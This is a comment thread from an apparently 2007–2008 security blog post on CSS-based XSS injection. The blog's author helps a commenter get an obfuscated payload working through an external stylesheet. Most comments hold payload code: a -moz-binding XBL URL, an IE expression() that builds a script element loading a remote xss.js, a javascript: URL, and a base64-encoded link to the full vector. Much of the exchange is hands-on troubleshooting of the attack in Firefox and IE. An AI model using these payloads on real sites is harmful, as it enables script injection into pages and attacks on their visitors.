Comments on: Ultimate XSS CSS injection http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/ A tool for designers dealing with programmers dealing with designers... Fri, 25 Jul 2008 14:16:20 +0000 http://wordpress.org/?v=2.5.1 By: no.connexion http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1092 no.connexion Sun, 20 Jan 2008 03:02:41 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1092 Please take a look in here: hxxp://noconnexion.wordpress.com/ Please take a look in here:
hxxp://noconnexion.wordpress.com/

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1090 Gareth Heyes Fri, 18 Jan 2008 15:57:58 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1090 Yep tested on IE and Firefox Yep tested on IE and Firefox

]]> By: no.connexion http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1089 no.connexion Fri, 18 Jan 2008 15:55:35 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1089 I guess I was using the converted version in my css here: b { \-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27&#x29 : 1); } I didn't use all the converted code for obvious reasons. Can you please confirm that you've done this through css and it works ? If yes I'll stop asking and I'll work my ass to make this work. I guess I was using the converted version in my css here:
b

{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27&#x29 : 1);
}

I didn’t use all the converted code for obvious reasons. Can you please confirm that you’ve done this through css and it works ? If yes I’ll stop asking and I’ll work my ass to make this work.

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1088 Gareth Heyes Fri, 18 Jan 2008 15:30:42 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1088 @no.connexion Dude you need to run "convert" in Hackvertor first before adding it to the page. @no.connexion

Dude you need to run “convert” in Hackvertor first before adding it to the page.

]]> By: no.connexion http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1087 no.connexion Fri, 18 Jan 2008 14:50:40 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1087 Thanks for response. Here are my final thoughts. Added in html the following: ... <style type="text/css"> @import url(http://www.example.com/css/test.css); </style> </head> <body> <b> This IS a test </b> </body> ... and the in test.css: ... b { \-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);<@hex_ent>xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval('x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(<@tocharcodes>http://businessinfo.co.uk/labs/xss/xss.js<@/tocharcodes>));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;')<@/hex_ent> : 1); } ... OR in test.css b { \-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27&#x29 : 1); } AND it works fine for Firefox but IE70 does nothing. I'm using 7.0.5730.13. Thanks for response.
Here are my final thoughts.
Added in html the following:


<style type=”text/css”>
@import url(http://www.example.com/css/test.css);
</style>
</head>
<body>
<b> This IS a test </b>
</body>

and the in test.css:

b

{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);<@hex_ent>xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval(’x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(<@tocharcodes>http://businessinfo.co.uk/labs/xss/xss.js<@/tocharcodes>));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;’)<@/hex_ent> : 1);
}

OR

in test.css
b

{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27&#x29 : 1);
}

AND it works fine for Firefox but IE70 does nothing. I’m using 7.0.5730.13.

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1084 Gareth Heyes Fri, 18 Jan 2008 09:17:35 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1084 @no.connexion Yeah it's possible to use it through a CSS file. In the file you need to define the rule as :- body { //code here } Then simply insert as a normal CSS through link or @import @no.connexion

Yeah it’s possible to use it through a CSS file. In the file you need to define the rule as :-

body {
//code here
}

Then simply insert as a normal CSS through link or @import

]]> By: no.connexion http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1083 no.connexion Fri, 18 Jan 2008 02:33:38 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1083 Thanks for answer. Is it possible to use this XSS through a css file? What I've tryed to do is to insert <link href="hxxp://wwwexample.com/css/xss.css"> and then <div class="somename" style="" id="inject">test</div> in html and the xss.css should look like <<< .sometext { \-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x78&#...&#x31&#x3B&#x27&#x29 : 1); } >>> or maybe something like that: body { background-image: url('javascript:alert("XSS");') } None of the above worked ... maybe I doing smthing wrong way or it's just not going to work. Thanks for answer. Is it possible to use this XSS through a css file? What I’ve tryed to do is to insert <link href=”hxxp://wwwexample.com/css/xss.css”> and then <div class=”somename” style=”" id=”inject”>test</div> in html and the xss.css should look like <<< .sometext {
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x78&#…&#x31&#x3B&#x27&#x29 : 1);
} >>>

or maybe something like that: body {
background-image: url(’javascript:alert(”XSS”);’)
}

None of the above worked … maybe I doing smthing wrong way or it’s just not going to work.

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1079 Gareth Heyes Thu, 17 Jan 2008 00:13:54 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1079 @no.connexion Hackvertor can also decode data you know ;) I've decoded it for you can provide the code so you can enter you're own:- http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PGRpdiBzdHlsZT0iXC1cbW9celwtYlxpXG5kXGluXGc6XHVybCgvL2J1c2luZXNzXGlcbmZvLmNvLnVrXC9sYWJzXC94YmxcL3hibFwueG1sXCN4c3MpOzxAaGV4X2VudD54eDogZVx4cFxyZVxzXHNcaVxvXG4oKHdpbmRvdy5yIT0xKSA%2FIGV2YWwoJ3g9U3RyaW5nLmZyb21DaGFyQ29kZTtzY3I9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCh4KDExNSw5OSwxMTQsMTA1LDExMiwxMTYpKTtzY3Iuc2V0QXR0cmlidXRlKHgoMTE1LDExNCw5OSkseCg8QHRvY2hhcmNvZGVzPmh0dHA6Ly9idXNpbmVzc2luZm8uY28udWsvbGFicy94c3MveHNzLmpzPEAvdG9jaGFyY29kZXM%2BKSk7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoeCggMTA1LDExMCwxMDYsMTAxLDk5LDExNiApKS5hcHBlbmRDaGlsZChzY3IpO3dpbmRvdy5yPTE7Jyk8QC9oZXhfZW50PiA6IDEpOyIgaWQ9ImluamVjdCI%2BdGVzdDwvZGl2Pg%3D%3D Hackvertor also has XSS tags which allow you to construct this vector, goto Hackvertor->XSS->mozbindingexpression @no.connexion

Hackvertor can also decode data you know ;)

I’ve decoded it for you can provide the code so you can enter you’re own:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PGRpdiBzdHlsZT0iXC1cbW9celwtYlxpXG5kXGluXGc6XHVybCgvL2J1c2luZXNzXGlcbmZvLmNvLnVrXC9sYWJzXC94YmxcL3hibFwueG1sXCN4c3MpOzxAaGV4X2VudD54eDogZVx4cFxyZVxzXHNcaVxvXG4oKHdpbmRvdy5yIT0xKSA%2FIGV2YWwoJ3g9U3RyaW5nLmZyb21DaGFyQ29kZTtzY3I9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCh4KDExNSw5OSwxMTQsMTA1LDExMiwxMTYpKTtzY3Iuc2V0QXR0cmlidXRlKHgoMTE1LDExNCw5OSkseCg8QHRvY2hhcmNvZGVzPmh0dHA6Ly9idXNpbmVzc2luZm8uY28udWsvbGFicy94c3MveHNzLmpzPEAvdG9jaGFyY29kZXM%2BKSk7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoeCggMTA1LDExMCwxMDYsMTAxLDk5LDExNiApKS5hcHBlbmRDaGlsZChzY3IpO3dpbmRvdy5yPTE7Jyk8QC9oZXhfZW50PiA6IDEpOyIgaWQ9ImluamVjdCI%2BdGVzdDwvZGl2Pg%3D%3D

Hackvertor also has XSS tags which allow you to construct this vector, goto Hackvertor->XSS->mozbindingexpression

]]> By: no.connexion http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1078 no.connexion Wed, 16 Jan 2008 20:32:23 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1078 Sorry for the mess but don't know to edit my post | guess that’s HEX there but I just don’t find any way to reverse it. |* Sorry for the mess but don’t know to edit my post | guess that’s HEX there but I just don’t find any way to reverse it. |*

]]> By: no.connexion http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1077 no.connexion Wed, 16 Jan 2008 20:30:55 +0000 http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/#comment-1077 Found some interesting thing here regarding this matter: hxxp://www.seo-blackhat.com/xss-cheat-sheet/ Found some interesting thing here regarding this matter: hxxp://www.seo-blackhat.com/xss-cheat-sheet/

]]>